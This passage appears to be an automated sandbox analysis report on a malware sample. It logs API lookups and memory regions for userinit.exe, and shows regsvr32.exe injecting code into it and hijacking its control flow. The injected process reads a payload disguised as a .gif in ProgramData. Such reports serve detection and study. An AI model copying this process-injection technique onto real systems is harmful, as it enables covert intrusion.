Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d6e266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d6e2542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d6e1d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d6e238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d6e20c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d6e1fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d6e1e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d6e1f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d6e1ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d6e216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d6e22be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d6e21e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8220ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8220b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8220c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8220d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 856047	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #60: userinit.exe

222

0

»

Information	Value
ID	#60
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:03:50, Reason: Child Process
Unmonitor	End Time: 00:03:53, Reason: Self Terminated
Monitor Duration	00:00:03

OS Process Information

»

Information	Value
PID	0xaa8
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 9BC 0x A40 0x A44

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rwx	-
pagefile_0x00000000000e0000	0x000e0000	0x000e6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000f0000	0x000f0000	0x000f1fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00100000	0x00100fff	Memory Mapped File	r	-
private_0x0000000000110000	0x00110000	0x0014ffff	Private Memory	rw	-
private_0x0000000000150000	0x00150000	0x00150fff	Private Memory	rwx	-
pagefile_0x0000000000160000	0x00160000	0x00161fff	Pagefile Backed Memory	r	-
windowsshell.manifest	0x00170000	0x00170fff	Memory Mapped File	r	-
private_0x00000000001c0000	0x001c0000	0x002bffff	Private Memory	rw	-
pagefile_0x00000000002c0000	0x002c0000	0x00387fff	Pagefile Backed Memory	r	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x00000000005f0000	0x005f0000	0x005fffff	Private Memory	rw	-
private_0x0000000000600000	0x00600000	0x006fffff	Private Memory	-	-
private_0x0000000000740000	0x00740000	0x0074ffff	Private Memory	rw	-
userinit.exe	0x00760000	0x00768fff	Memory Mapped File	rwx	-
pagefile_0x0000000000770000	0x00770000	0x0136ffff	Pagefile Backed Memory	r	-
private_0x0000000001370000	0x01370000	0x0154ffff	Private Memory	rw	-
pagefile_0x0000000001370000	0x01370000	0x0144efff	Pagefile Backed Memory	r	-
private_0x0000000001450000	0x01450000	0x014effff	Private Memory	rw	-
private_0x0000000001510000	0x01510000	0x0154ffff	Private Memory	rw	-
staticcache.dat	0x01550000	0x01e7ffff	Memory Mapped File	r	-
pagefile_0x0000000001e80000	0x01e80000	0x02272fff	Pagefile Backed Memory	r	-
private_0x0000000002280000	0x02280000	0x022fffff	Private Memory	rw	-
private_0x0000000002300000	0x02300000	0x0240cfff	Private Memory	rw	-
private_0x0000000002410000	0x02410000	0x0250ffff	Private Memory	rw	-
private_0x0000000002510000	0x02510000	0x0270ffff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x02790fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x02794fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x02798fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x0279cfff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027a2fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027a6fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027aafff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027aefff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027b4fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027b8fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027bcfff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027c2fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027c6fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027cafff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027cefff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027d4fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027d8fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027dcfff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027e2fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027e6fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027eafff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027eefff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027f4fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027f8fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x027fcfff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x02802fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x02806fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x0280afff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x0280efff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x02814fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x02818fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x0281cfff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x02822fff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x02826fff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x0282afff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x0282efff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x02844fff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x02848fff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x0284cfff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x02850fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x02866fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x0286afff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x0286efff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x02884fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x02888fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x0288cfff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x02890fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028a6fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028aafff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028aefff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028c4fff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028c8fff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028ccfff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028d0fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028e6fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028eafff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028eefff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x02904fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x02908fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x0290cfff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x02910fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02926fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0292afff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0292ffff	Private Memory	-	-
private_0x0000000002830000	0x02830000	0x028c0fff	Private Memory	rw	-
private_0x0000000002860000	0x02860000	0x02902fff	Private Memory	rw	-
private_0x0000000002870000	0x02870000	0x02920fff	Private Memory	rw	-
private_0x00000000028a0000	0x028a0000	0x02962fff	Private Memory	rw	-
private_0x00000000028b0000	0x028b0000	0x02980fff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029c2fff	Private Memory	rw	-
private_0x00000000028f0000	0x028f0000	0x029e0fff	Private Memory	rw	-
private_0x0000000002920000	0x02920000	0x02a22fff	Private Memory	rw	-
private_0x0000000002930000	0x02930000	0x02a42fff	Private Memory	rwx	-
private_0x0000000002a50000	0x02a50000	0x02b4ffff	Private Memory	-	-
private_0x0000000002b50000	0x02b50000	0x02c4ffff	Private Memory	rw	-
private_0x0000000002ce0000	0x02ce0000	0x02d1ffff	Private Memory	rw	-
sortdefault.nls	0x02d20000	0x02feefff	Memory Mapped File	r	-
comctl32.dll	0x6d6b0000	0x6d733fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d800000	0x6d818fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd6000	0x7ffd6000	0x7ffd6fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffd6008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0x9bc, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d800000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d6b0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = 4ð, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d6e266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d6e2542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d6e1d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d6e238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d6e20c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d6e1fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d6e1e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d6e1f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d6e1ccd	2	Fn
